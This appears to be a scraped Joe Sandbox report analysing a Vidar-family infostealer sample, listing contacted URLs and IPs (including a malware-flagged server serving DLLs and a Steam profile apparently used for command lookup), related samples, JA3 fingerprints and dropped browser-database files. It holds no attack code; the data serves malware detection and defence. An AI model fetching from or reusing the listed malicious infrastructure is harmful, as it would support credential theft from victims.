                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchJEGHDA.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://t.me/k0monofile.exe, 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199686524322/inventory/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199686524322/badgesRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/workshop/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/legal/RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sqlite.org/copyright.html.RegAsm.exe, 00000003.00000002.2044042072.000000001928D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=englRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=enRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgRegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoJEGHDA.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://95.217.240.101/softokn3.dllKRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&amRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engliRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exeRegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=JEGHDA.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101/vRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    23.194.234.100
                    		steamcommunity.comUnited States
                    		16625AKAMAI-ASUStrue
                    95.217.240.101
                    		unknownGermany
                    		24940HETZNER-ASDEfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1442218
                    Start date and time:2024-05-15 20:35:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 29s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@11/25@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 105
                    • Number of non-executed functions: 217
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    20:35:57API Interceptor1x Sleep call for process: RegAsm.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    23.194.234.100file.exeGet hashmaliciousVidarBrowse
                      file.exeGet hashmaliciousVidarBrowse
                        file.exeGet hashmaliciousVidarBrowse
                          UJzMs6lsyF.exeGet hashmaliciousVidarBrowse
                            file.exeGet hashmaliciousVidarBrowse
                              file.exeGet hashmaliciousVidarBrowse
                                CDssd7jEvY.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                  file.exeGet hashmaliciousVidarBrowse
                                    7qAKRRMho6.exeGet hashmaliciousGCleaner, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                      file.exeGet hashmaliciousVidarBrowse
                                        95.217.240.101file.exeGet hashmaliciousVidarBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          steamcommunity.comfile.exeGet hashmaliciousVidarBrowse
                                          • 23.194.234.100
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 184.85.65.125
                                          mod01_pdf.lnkGet hashmaliciousUnknownBrowse
                                          • 23.65.44.84
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 104.106.57.101
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 184.85.65.125
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 184.85.65.125
                                          file.exeGet hashmaliciousPrivateLoader, PureLog Stealer, Vidar, zgRATBrowse
                                          • 184.85.65.125
                                          file.exeGet hashmaliciousClipboard Hijacker, PrivateLoader, VidarBrowse
                                          • 184.85.65.125
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 23.195.238.96
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 104.105.90.131

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          AKAMAI-ASUShttps://drive.google.com/file/d/11Nff_nSTj-qAFgshL0mhor7fJP9kHxH0/view?usp=drive_webGet hashmaliciousQuasarBrowse
                                          • 23.196.176.131
                                          FW Server Notice Heatherg System Alert Notification..emlGet hashmaliciousHTMLPhisherBrowse
                                          • 23.43.173.38
                                          https://us22.mailchimp.com/mctx/clicks?url=https%3A%2F%2Fnaport.com.br%2Ftech&xid=b07540652e&uid=212127442&iid=43a204bb7e&pool=cts&v=2&c=1715276467&h=633aae99b87aa03fcfcd4d0ee69f8d68261dff9fc69fccbb3cfe374e7c574b94Get hashmaliciousUnknownBrowse
                                          • 72.246.62.115
                                          https://1drv.ms/f/s!Au13bCs5C-oDg80wq6Iti50hSMW3rA?e=vlTf9zGet hashmaliciousUnknownBrowse
                                          • 23.196.176.131
                                          http://salecinask.liveGet hashmaliciousUnknownBrowse
                                          • 23.221.214.135
                                          http://salecinask.liveGet hashmaliciousUnknownBrowse
                                          • 184.26.116.50
                                          support.Client.exe.zipGet hashmaliciousScreenConnect ToolBrowse
                                          • 23.193.120.112
                                          https://gamma.app/docs/Shared-Notice-and-Email-Disclaimers-6aqig6w4unouiqo?mode=present#card-cngszya3osgcwyjGet hashmaliciousHTMLPhisherBrowse
                                          • 23.67.64.198
                                          https://erzincanaktastaksi.com/20/w2_2023_Up.zipGet hashmaliciousXWormBrowse
                                          • 23.202.101.159
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 23.194.234.100
                                          HETZNER-ASDEPPR & PARTNER Pape Rauh #U201cAttached document to review & sign#U201d with you.emlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                          • 78.46.157.212
                                          https://download.filezilla-project.org/client/FileZilla_3.67.0_win64_sponsored2-setup.exeGet hashmaliciousUnknownBrowse
                                          • 49.12.121.47
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 95.217.240.101
                                          x15Wvov9Bj.elfGet hashmaliciousMiraiBrowse
                                          • 188.34.238.142
                                          YCrL9vbZ3g.elfGet hashmaliciousMiraiBrowse
                                          • 46.4.110.27
                                          Aqua.x86.elfGet hashmaliciousMiraiBrowse
                                          • 144.79.222.198
                                          Xlrfx.batGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 135.181.215.231
                                          Order List 300572024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 135.181.215.231
                                          new order 20240508.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 135.181.215.231
                                          Shipping Advice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 135.181.215.231

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                          • 95.217.240.101
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 95.217.240.101
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 95.217.240.101
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 95.217.240.101
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 95.217.240.101
                                          file.exeGet hashmaliciousPrivateLoader, PureLog Stealer, Vidar, zgRATBrowse
                                          • 95.217.240.101
                                          file.exeGet hashmaliciousClipboard Hijacker, PrivateLoader, VidarBrowse
                                          • 95.217.240.101
                                          .pdf.scr.exeGet hashmaliciousCobaltStrikeBrowse
                                          • 95.217.240.101
                                          .pdf.scr.exeGet hashmaliciousCobaltStrikeBrowse
                                          • 95.217.240.101
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 95.217.240.101
                                          37f463bf4616ecd445d4a1937da06e19Justificante pago 80923089.exeGet hashmaliciousGuLoaderBrowse
                                          • 23.194.234.100
                                          SecuriteInfo.com.Win32.SpywareX-gen.21792.30077.dllGet hashmaliciousUnknownBrowse
                                          • 23.194.234.100
                                          SecuriteInfo.com.Win32.SpywareX-gen.19771.22491.dllGet hashmaliciousUnknownBrowse
                                          • 23.194.234.100
                                          SecuriteInfo.com.Win32.SpywareX-gen.21792.30077.dllGet hashmaliciousUnknownBrowse
                                          • 23.194.234.100
                                          SecuriteInfo.com.Win32.SpywareX-gen.19771.22491.dllGet hashmaliciousUnknownBrowse
                                          • 23.194.234.100
                                          file.exeGet hashmaliciousAmadeyBrowse
                                          • 23.194.234.100
                                          V#U2550DEOS.EXEGet hashmaliciousBrontokBrowse
                                          • 23.194.234.100
                                          LCS-155-44 01_General_Purchase_Order_Terms_and_Conditions.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 23.194.234.100
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 23.194.234.100
                                          20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.exeGet hashmaliciousGuLoaderBrowse
                                          • 23.194.234.100

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\ProgramData\GHIJJEGDBFII\mozglue.dllHaxexQ5EjD.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                            file.exeGet hashmaliciousVidarBrowse
                                              40UAEu1Kpt.exeGet hashmaliciousLummaC, CryptOne, GCleaner, Glupteba, Mars Stealer, PrivateLoader, PureLog StealerBrowse
                                                file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                  file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                    file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                      file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                        file.exeGet hashmaliciousPrivateLoader, PureLog Stealer, Vidar, zgRATBrowse
                                                          file.exeGet hashmaliciousClipboard Hijacker, PrivateLoader, VidarBrowse
                                                            WcBJX1H1hg.exeGet hashmaliciousMars Stealer, PrivateLoader, Stealc, VidarBrowse
                                                              C:\ProgramData\GHIJJEGDBFII\freebl3.dllHaxexQ5EjD.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                file.exeGet hashmaliciousVidarBrowse
                                                                  40UAEu1Kpt.exeGet hashmaliciousLummaC, CryptOne, GCleaner, Glupteba, Mars Stealer, PrivateLoader, PureLog StealerBrowse
                                                                    file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                      file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                            file.exeGet hashmaliciousPrivateLoader, PureLog Stealer, Vidar, zgRATBrowse
                                                                              file.exeGet hashmaliciousClipboard Hijacker, PrivateLoader, VidarBrowse
                                                                                WcBJX1H1hg.exeGet hashmaliciousMars Stealer, PrivateLoader, Stealc, VidarBrowse

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\GHIJJEGDBFII\AEHDAK

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):126976
                                                                                  Entropy (8bit):0.47147045728725767
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\CBFIJE

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):98304
                                                                                  Entropy (8bit):0.08235737944063153
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\CBFIJE-shm

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.017262956703125623
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\CFHCGH

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):114688
                                                                                  Entropy (8bit):0.9746603542602881
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\GCBFBG

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):5242880
                                                                                  Entropy (8bit):0.037963276276857943
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\GCBFBG-shm

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.017262956703125623
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                  Malicious:false
                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\GDAAKF

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                  Category:dropped
                                                                                  Size (bytes):159744
                                                                                  Entropy (8bit):0.7873599747470391
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\GHIJJE

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):49152
                                                                                  Entropy (8bit):0.8180424350137764
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\HDAFII

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                  Category:dropped
                                                                                  Size (bytes):28672
                                                                                  Entropy (8bit):2.5793180405395284
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\IIDHJD

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):9571
                                                                                  Entropy (8bit):5.536643647658967
                                                                                  Encrypted:false
